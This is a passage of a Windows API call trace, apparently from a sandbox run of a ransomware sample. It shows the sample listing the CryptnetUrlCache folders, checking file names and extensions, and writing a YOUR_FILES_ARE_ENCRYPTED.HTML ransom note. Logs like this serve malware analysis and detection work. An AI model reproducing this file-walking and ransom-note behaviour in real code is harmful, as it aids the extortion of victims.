nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0122.329] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="..", cAlternateFileName="")) returned 1 [0122.329] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x81bb7e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81bb7e44, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="Content", cAlternateFileName="")) returned 1 [0122.329] StrStrIW (lpFirst="Content", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.329] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 77 [0122.329] GetProcessHeap () returned 0x600000 [0122.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.331] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0122.331] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*" [0122.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x81bb7e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa7f5badf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0122.332] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x81bb7e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa7f5badf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="..", cAlternateFileName="")) returned 1 [0122.332] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xa7f5badf, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7f5badf, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7f5f3cf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x6dc, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="55C4822D0F35FE8F4F67713B4F628992", cAlternateFileName="55C482~1")) returned 1 [0122.332] StrStrIW (lpFirst="55C4822D0F35FE8F4F67713B4F628992", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.332] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\55C4822D0F35FE8F4F67713B4F628992") returned 110 [0122.332] PathFindExtensionW (pszPath="55C4822D0F35FE8F4F67713B4F628992") returned="" [0122.332] lstrlenW (lpString="") returned 0 [0122.332] PathFindExtensionW (pszPath="55C4822D0F35FE8F4F67713B4F628992") returned="" [0122.332] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64a9c09, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x64a9c09, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x64a9c09, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x12bb, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0122.333] StrStrIW (lpFirst="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.333] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 110 [0122.333] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0122.333] lstrlenW (lpString="") returned 0 [0122.333] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0122.333] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65b4c5b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65b4c5b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x65b4c5b, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961", cAlternateFileName="69B5E9~1")) returned 1 [0122.333] StrStrIW (lpFirst="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.333] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961") returned 143 [0122.333] PathFindExtensionW (pszPath="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961") returned="" [0122.333] lstrlenW (lpString="") returned 0 [0122.333] PathFindExtensionW (pszPath="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961") returned="" [0122.333] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x81bb7e44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81bb7e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81bccb9e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5e3, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442", cAlternateFileName="6BADA8~1")) returned 1 [0122.333] StrStrIW (lpFirst="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.333] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442") returned 143 [0122.333] PathFindExtensionW (pszPath="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442") returned="" [0122.333] lstrlenW (lpString="") returned 0 [0122.333] PathFindExtensionW (pszPath="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442") returned="" [0122.333] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776", cAlternateFileName="7423F8~1")) returned 1 [0122.334] StrStrIW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.334] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776") returned 143 [0122.334] PathFindExtensionW (pszPath="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776") returned="" [0122.334] lstrlenW (lpString="") returned 0 [0122.334] PathFindExtensionW (pszPath="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776") returned="" [0122.334] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65dad7a, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65dad7a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x65dad7a, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0122.334] StrStrIW (lpFirst="77EC63BDA74BD0D0E0426DC8F8008506", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.334] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506") returned 110 [0122.334] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0122.334] lstrlenW (lpString="") returned 0 [0122.334] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0122.334] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65dad7a, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65dad7a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x2af524cd, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0122.334] StrStrIW (lpFirst="FB0D848F74F70BB2EAA93746D24D9749", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.334] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749") returned 110 [0122.334] PathFindExtensionW (pszPath="FB0D848F74F70BB2EAA93746D24D9749") returned="" [0122.334] lstrlenW (lpString="") returned 0 [0122.334] PathFindExtensionW (pszPath="FB0D848F74F70BB2EAA93746D24D9749") returned="" [0122.335] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65dad7a, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65dad7a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x2af524cd, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0122.335] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0122.335] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0122.335] GetProcessHeap () returned 0x600000 [0122.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.341] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.346] CloseHandle (hObject=0x308) returned 1 [0122.347] GetProcessHeap () returned 0x600000 [0122.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.348] GetProcessHeap () returned 0x600000 [0122.348] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.348] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa7f57eb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7f57eb7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f140, dwReserved1=0x63c558, cFileName="MetaData", cAlternateFileName="")) returned 1 [0122.348] StrStrIW (lpFirst="MetaData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.348] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 78 [0122.348] GetProcessHeap () returned 0x600000 [0122.348] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.349] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0122.349] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*" [0122.349] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa7f57eb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7f57eb7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName=".", cAlternateFileName="")) returned 0x626778 [0122.354] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa7f57eb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7f57eb7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="..", cAlternateFileName="")) returned 1 [0122.355] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xa7f57eb7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7f57eb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7f5f3cf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xfe, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="55C4822D0F35FE8F4F67713B4F628992", cAlternateFileName="55C482~1")) returned 1 [0122.355] StrStrIW (lpFirst="55C4822D0F35FE8F4F67713B4F628992", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.355] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\55C4822D0F35FE8F4F67713B4F628992") returned 111 [0122.355] PathFindExtensionW (pszPath="55C4822D0F35FE8F4F67713B4F628992") returned="" [0122.355] lstrlenW (lpString="") returned 0 [0122.356] PathFindExtensionW (pszPath="55C4822D0F35FE8F4F67713B4F628992") returned="" [0122.356] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64a9c09, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x64a9c09, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xa5bc9fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0122.356] StrStrIW (lpFirst="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.357] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 111 [0122.357] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0122.357] lstrlenW (lpString="") returned 0 [0122.357] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0122.357] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65b4c5b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65b4c5b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x2a5c8f0f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1aa, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961", cAlternateFileName="69B5E9~1")) returned 1 [0122.357] StrStrIW (lpFirst="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.357] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961") returned 144 [0122.357] PathFindExtensionW (pszPath="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961") returned="" [0122.358] lstrlenW (lpString="") returned 0 [0122.358] PathFindExtensionW (pszPath="69B5E9A1CA834DA32C0A425757544385_035360C022BF84B8EB76A765EC8E8961") returned="" [0122.359] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x81bb59b3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81bb59b3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa5afc463, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1be, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442", cAlternateFileName="6BADA8~1")) returned 1 [0122.359] StrStrIW (lpFirst="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.359] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442") returned 144 [0122.359] PathFindExtensionW (pszPath="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442") returned="" [0122.359] lstrlenW (lpString="") returned 0 [0122.359] PathFindExtensionW (pszPath="6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442") returned="" [0122.360] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4f14c05a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a5ef114, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776", cAlternateFileName="7423F8~1")) returned 1 [0122.360] StrStrIW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.360] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776") returned 144 [0122.361] PathFindExtensionW (pszPath="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776") returned="" [0122.361] lstrlenW (lpString="") returned 0 [0122.361] PathFindExtensionW (pszPath="7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776") returned="" [0122.361] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x65dad7a, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x65dad7a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x65dad7a, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x31613f4, dwReserved1=0x3161368, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0122.361] StrStrIW (lpFirst="77EC63BDA74BD0D0E0426DC8F8008506", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.361] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506") returned 111 [0122.361] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0122.363] lstrlenW (lpString="") returned 0 [0122.364] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0122.364] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2024, 